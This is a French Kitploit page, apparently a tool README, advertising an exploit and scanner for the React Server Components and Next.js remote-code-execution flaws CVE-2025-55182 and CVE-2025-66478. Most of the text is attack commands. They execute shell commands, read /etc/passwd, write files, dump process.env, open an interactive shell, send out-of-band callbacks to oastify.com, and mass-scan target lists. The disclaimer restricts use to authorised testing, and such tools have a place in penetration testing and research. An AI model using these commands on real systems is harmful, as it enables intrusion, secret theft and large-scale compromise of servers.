Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !
CVE-2025-55182-Exploit-PoC-Scanner — Outil d'exploitation pour CVE-2025-55182 et CVE-2025-66478 dans React Server Components et Next.js, avec gadgets RCE, lecture/écriture de fichiers, rappels hors bande et shell interactif pour les tests de sécurité autorisés. | Kitploit
Outil d'exploitation pour CVE-2025-55182 et CVE-2025-66478 dans React Server Components et Next.js, avec gadgets RCE, lecture/écriture de fichiers, rappels hors bande et shell interactif pour les tests de sécurité autorisés.
CVE-2025-55182 - Exploit RCE des Composants Serveur React v2.0
Un outil complet de recherche en sécurité pour tester les vulnérabilités CVE-2025-55182 et CVE-2025-66478 dans les Composants Serveur React (RSC) et les Actions Serveur Next.js.
Aperçu de la vulnérabilité
Propriété
Valeur
Identifiants CVE
CVE-2025-55182, CVE-2025-66478
Score CVSS
10.0 (CRITIQUE)
Versions concernées
React < 19.2.0, Next.js < 15.0.5
Type de vulnérabilité
Exécution de code à distance (RCE)
Vecteur d'attaque
Réseau
Fonctionnalités
Scan de vulnérabilités de style PortSwigger avec plusieurs charges de détection
Plusieurs gadgets RCE (execSync, spawnSync, vm.runInThisContext, etc.)
Test de rappel hors bande (OOB) pour vérification RCE aveugle
Capacités de lecture/écriture de fichiers
Exécution de code JavaScript
Mode shell interactif
Scan en masse avec multi-threading
Support proxy (compatible Burp Suite)
Formats de sortie JSON/Texte
Installation
Prérequis
root@kitploit:~
pip install requests
Version Python
Python 3.7 ou supérieur
Démarrage rapide
root@kitploit:~
# Vérification de vulnérabilité de base
python3 exploit-custom.py -u https://target.com --check
# Scan de vulnérabilité complet (recommandé)
python3 exploit-custom.py -u https://target.com --scan
# Avec proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# Test de rappel OOB
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# Exécution de commande
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Shell interactif
python3 exploit-custom.py -u https://target.com --shell
Vérification rapide de vulnérabilité (test mathématique)
--scan
Scan de vulnérabilité complet (style PortSwigger)
--test-all
Tester tous les gadgets et charges de détection
Exploitation
Argument
Description
Exemple
--cmd
Exécuter une commande shell
--cmd "id"
--gadget
Spécifier le gadget à utiliser
--gadget execSync
--read
Lire un fichier sur la cible
--read /etc/passwd
--write
Écrire un fichier sur la cible
--write /tmp/test.txt "contenu"
--js
Exécuter du code JavaScript
--js "process.env"
--shell
Démarrer un shell interactif
--shell
--oob
Hôte de rappel OOB
--oob xyz.oastify.com
Options de connexion
Argument
Description
Exemple
-p, --proxy
Proxy HTTP/HTTPS
-p http://127.0.0.1:8080
-c, --cookies
Chaîne de cookies
-c "session=abc123"
-H, --header
En-tête supplémentaire (répétable)
-H "X-Custom: value"
-t, --threads
Nombre de threads pour le scan en masse
-t 20
--timeout
Délai d'attente de requête en secondes
--timeout 60
Options de sortie
Argument
Description
-o, --output
Enregistrer les résultats dans un fichier (.json ou .txt)
-q, --quiet
Supprimer la bannière
Exemples de scan
Cible unique
root@kitploit:~
# Détecter Next.js et RSC
python3 exploit-custom.py -u https://target.com --detect
# Vérification rapide de vulnérabilité
python3 exploit-custom.py -u https://target.com --check
# Scan complet avec toutes les charges de détection
python3 exploit-custom.py -u https://target.com --scan
# Tester tous les gadgets avec vérification OOB
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
Scan en masse
root@kitploit:~
# Scanner plusieurs cibles
python3 exploit-custom.py -l targets.txt --scan -o results.json
# Avec un nombre de threads augmenté
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# Avec rappels OOB
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
Cet outil est fourni uniquement pour les tests de sécurité autorisés et à des fins éducatives.
ATTENTION : L'accès non autorisé à des systèmes informatiques est illégal. N'utilisez cet outil que sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de test.
Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.
Licence
Cet outil est publié à des fins de recherche en sécurité et de tests d'intrusion autorisés.